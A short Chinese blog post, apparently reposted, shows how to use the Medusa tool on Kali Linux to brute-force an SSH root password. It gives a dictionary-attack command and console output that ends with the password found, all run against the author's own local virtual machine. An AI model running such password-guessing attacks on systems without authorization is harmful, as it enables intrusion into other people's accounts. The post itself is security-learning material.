使用kali破解linux登录密码

       一直想学好安全方面的知识，但苦于没门路，所以才开博，目的是记录自己学习的东西，同时也会以后学习这方面东西的兄弟提供些可参照物

 

         kali是啥就没必要介绍了，里面有大量的安全工具，基本搞安全的兄弟对这玩意或多或少都有接触，在kaili里用于破解ssh登录密码的工具，比较常用的就是medusa，打开控制台，直接输入 :medusa就会跳出这个工具的使用帮助：

 

      上面的语法提示告知了这个工具的使用方法，我在本地搭建了测试环境，并制作了自己破解常用的字典，破解步骤如下：

 

      Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

 

      在本次破解，使用的破解语句：medusa -h 192.168.171.135 -u root -P test.txt  -M ssh

 

      破解 的含义也不复杂：破解的目标是192.168.171.135  用户名是root,如果不知道用户名，可以用-U，里面保护一堆用户名字典，这样破解的速度会增加，毕竟会不断的去匹配用户名和密码，密码字典是test.txt,破解的功能是ssh

 

      执行破解就好了：

 

 

?

1

2

3

4

5

6

7

8

9

root@kali:~# medusa -h 192.168.171.130 -u root -P Desktop/text.txt -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

 

ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin (1 of 10 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 10 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: pass (3 of 10 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.171.130 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: test234 (4 of 10 complete)

ACCOUNT FOUND: [ssh] Host: 192.168.171.130 User: root Password: test234[SUCCESS]

root@kali:~#

 

        这里出了点儿偏差：我的ip地址改了，因为我虚拟机里没装ssh。。。抱歉。。上面就测出登录密码了       

 

 

很多事儿，上帝安排好了，凭着直觉去日吧

转载自http://www.2cto.com/Article/201401/272010.html